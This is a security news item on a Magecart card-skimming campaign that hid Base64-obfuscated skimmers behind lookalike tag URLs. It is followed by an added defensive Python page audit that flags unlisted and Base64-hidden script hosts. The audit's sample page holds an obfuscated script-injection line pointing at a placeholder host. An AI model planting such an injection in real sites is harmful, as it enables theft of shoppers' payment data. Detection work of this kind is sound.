A new Magecart credit card stealing campaign has been highlighted by Akamai. This new campaign hijacks retail sites to act as temporary C2 servers to inject and hide the skimmers on targeted eCommerce sites in the US, the UK, Australia, Brazil, Peru, and Estonia. Many of the victims did not realize they were breached for over a month as the threat actors had obfuscated the skimmer with Base64 encoding, hiding the host’s URL so it resembles that of Google Tag Manager or Facebook Pixel.
David Ratner, CEO at HYAS, shares these insights:
“Protective DNS solutions are known for observing and stopping anomalous communications or connections coming out of an organization to known nefarious infrastructure; however, consumers accessing websites behave in much the same way, as the traversal of the website generates a series of connections to other domains and, in the case of Magecart infections, some being to nefarious locations. Protective DNS solutions can also be utilized by organizations to periodically scan their consumer-facing websites to identify these anomalous communications and address Magecart and other vulnerabilities, before significant numbers of consumers are taken advantage of.”
This is one of those areas where both consumers and organizations need to take steps to protect each other. Doing so makes these sorts of campaigns less effective.
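A static version of the periodic self-scan of a consumer-facing page described above, written as an added example (not code from Akamai, HYAS or the original article, and not a protective DNS product): it lists the hosts a page loads scripts from, including hosts that only become visible after Base64-decoding string literals, and reports any that are not on an allow-list. The allow-list, host names and sample page are constructed assumptions.

```python
import base64
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: hosts this (hypothetical) shop intentionally loads scripts from.
ALLOWED_HOSTS = {"www.googletagmanager.com", "connect.facebook.net"}
B64_LITERAL = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")  # long base64-looking runs
URL_IN_TEXT = re.compile(r"(?:https?:)?//[A-Za-z0-9.-]+\.[A-Za-z]{2,}[^\s'\"]*")

class ScriptCollector(HTMLParser):
    """Collects external script URLs and inline script bodies."""
    def __init__(self):
        super().__init__()
        self.sources, self.inline, self._in_script = [], [], False
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            self.sources.append(dict(attrs).get("src"))
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self.inline.append(data)

def decoded_urls(script_text):
    """Yield URLs that appear only after base64-decoding literals in a script."""
    for literal in B64_LITERAL.findall(script_text):
        try:
            text = base64.b64decode(literal, validate=True).decode("ascii")
        except ValueError:  # not valid base64, or not ASCII once decoded
            continue
        yield from URL_IN_TEXT.findall(text)

def audit_page(html, allowed_hosts=ALLOWED_HOSTS):
    """Return sorted (kind, host) findings; same-origin relative paths are ignored."""
    collector = ScriptCollector()
    collector.feed(html)
    found = {("script-src", urlparse(s).hostname) for s in collector.sources if s}
    for body in collector.inline:
        found |= {("base64-url", urlparse(u).hostname) for u in decoded_urls(body)}
    return sorted(f for f in found if f[1] and f[1] not in allowed_hosts)

# Constructed sample page; the encoded host is a made-up placeholder.
HIDDEN = base64.b64encode(b"https://tags.hijacked-shop.example/gtm.js").decode()
SAMPLE_HTML = f"""<script src="https://www.googletagmanager.com/gtm.js?id=GTM-XXXX"></script>
<script src="/static/cart.js"></script>
<script>var s=document.createElement("script");s.src=atob("{HIDDEN}");document.head.appendChild(s);</script>"""
```

Calling `audit_page(SAMPLE_HTML)` reports only the host hidden behind the Base64 literal; a real deployment would also need to render the page and record runtime requests, since a static pass cannot see scripts injected by other scripts.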